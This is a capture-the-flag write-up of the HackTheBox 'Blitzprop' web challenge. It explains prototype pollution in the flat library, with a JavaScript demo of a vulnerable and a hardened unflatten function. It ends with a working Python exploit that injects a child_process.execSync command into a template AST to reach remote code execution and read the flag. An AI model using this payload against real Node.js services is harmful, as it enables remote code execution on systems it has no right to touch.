---
name: Blitzprop (2021)
event: HackTheBox Cyber Apocalypse CTF 2021
category: Web
description: Writeup for Blitzprop (Web) - HackTheBox Cyber Apocalypse CTF (2021) 💜
layout:
  title:
    visible: true
  description:
    visible: true
  tableOfContents:
    visible: true
  outline:
    visible: true
  pagination:
    visible: true
---

# Blitzprop

## Video Walkthrough


## Challenge Description

To solve this challenge, you need to exploit a 'prototype pollution' vulnerability in the flat library in order to gain RCE on the target. It takes one request to the server to 'pollute' the JavaScript object prototype, then a second request to trigger the payload. Overall, it was a really interesting box!
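To show why a single `__proto__.block` key in the request body is enough, here is an added example that is not part of the original writeup and not the flat library's own code: a minimal re-implementation of a dotted-key `unflatten` that walks into inherited properties (the bug class behind this challenge), next to a hardened variant that rejects the `__proto__`, `constructor` and `prototype` segments and only reuses containers that are own properties of the object being built. The sample body is constructed to mirror the challenge's request shape, with a harmless placeholder instead of the command.

```javascript
// Added example, not code from the writeup or from the flat library itself.
// A minimal re-implementation of a dotted-key "unflatten" that walks into
// inherited properties, next to a hardened variant. The sample body below
// is constructed for this demo.

const UNSAFE_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable: descends through cursor[part] without checking whether the
// segment names an own property, so "__proto__" walks onto Object.prototype
// and the final assignment lands there, visible to every object in the process.
function unflattenUnsafe(flat) {
  const result = {};
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    let cursor = result;
    for (let i = 0; i < parts.length - 1; i++) {
      const part = parts[i];
      if (typeof cursor[part] !== 'object' || cursor[part] === null) {
        cursor[part] = {};
      }
      cursor = cursor[part]; // for "__proto__" this is Object.prototype
    }
    cursor[parts[parts.length - 1]] = value;
  }
  return result;
}

// Hardened: reject any path containing a prototype-reaching segment, and only
// reuse an existing container when it is an own property of the current node.
function unflattenSafe(flat) {
  const result = {};
  for (const [path, value] of Object.entries(flat)) {
    const parts = path.split('.');
    const bad = parts.find((p) => UNSAFE_SEGMENTS.has(p));
    if (bad !== undefined) {
      throw new Error(`rejected key path "${path}": segment "${bad}" is not allowed`);
    }
    let cursor = result;
    for (let i = 0; i < parts.length - 1; i++) {
      const part = parts[i];
      const own = Object.prototype.hasOwnProperty.call(cursor, part);
      if (!own || typeof cursor[part] !== 'object' || cursor[part] === null) {
        cursor[part] = {};
      }
      cursor = cursor[part];
    }
    cursor[parts[parts.length - 1]] = value;
  }
  return result;
}

// Constructed request body shaped like the challenge's: a legitimate key plus
// a key that climbs onto the prototype. The "line" value is a harmless placeholder.
const SAMPLE_BODY = {
  'song.name': 'The Goose went wild',
  '__proto__.block': { type: 'Text', line: 'PLACEHOLDER' },
};

// Runs the vulnerable version and reports whether an unrelated, freshly
// created object inherited "block". Cleans Object.prototype up afterwards.
function demonstratePollution() {
  const before = ({}).block === undefined;
  unflattenUnsafe(SAMPLE_BODY);
  const polluted = ({}).block !== undefined && ({}).block.type === 'Text';
  delete Object.prototype.block;
  const after = ({}).block === undefined;
  return { before, polluted, after };
}

// Runs the hardened version on the same body: it must throw and leave
// Object.prototype untouched.
function demonstrateHardened() {
  let rejected = false;
  try {
    unflattenSafe(SAMPLE_BODY);
  } catch (e) {
    rejected = true;
  }
  return rejected && ({}).block === undefined;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', demonstratePollution());
  console.log('hardened rejected and stayed clean:', demonstrateHardened());
  console.log('normal input:', JSON.stringify(unflattenSafe({ 'song.name': 'x' })));
}
```

The own-property check matters as much as the deny-list: without it, a segment that happens to match an inherited name would still be descended into. Rejecting the request outright (rather than silently dropping the key) also gives the application a clear event to log, which is what a detection rule for this class of input would key on.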

## Solution

{% code overflow="wrap" %}

```python
from pwn import *  # only used for success() to print the flag
import requests

TARGET_URL = 'http://188.166.172.13:31177'

# First request: the server unflattens the JSON body with the flat library, so the
# "__proto__.block" key lands on Object.prototype. The template compiler later picks
# up the polluted "block" node and emits its "line" value into generated code.
# Technique from https://blog.p6.is/AST-Injection/
result = requests.post(TARGET_URL + '/api/submit', json={
    "song.name": "The Goose went wild",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync(`cp flagz8gWv static/flag`)"
    }
})

# Second request: rendering triggers the injected code, which copied the flag into
# the static directory, so it can simply be fetched from there.
flag = requests.get(TARGET_URL + '/static/flag').text
success(flag)
```

{% endcode %}

Flag: CHTB{p0llute_with_styl3}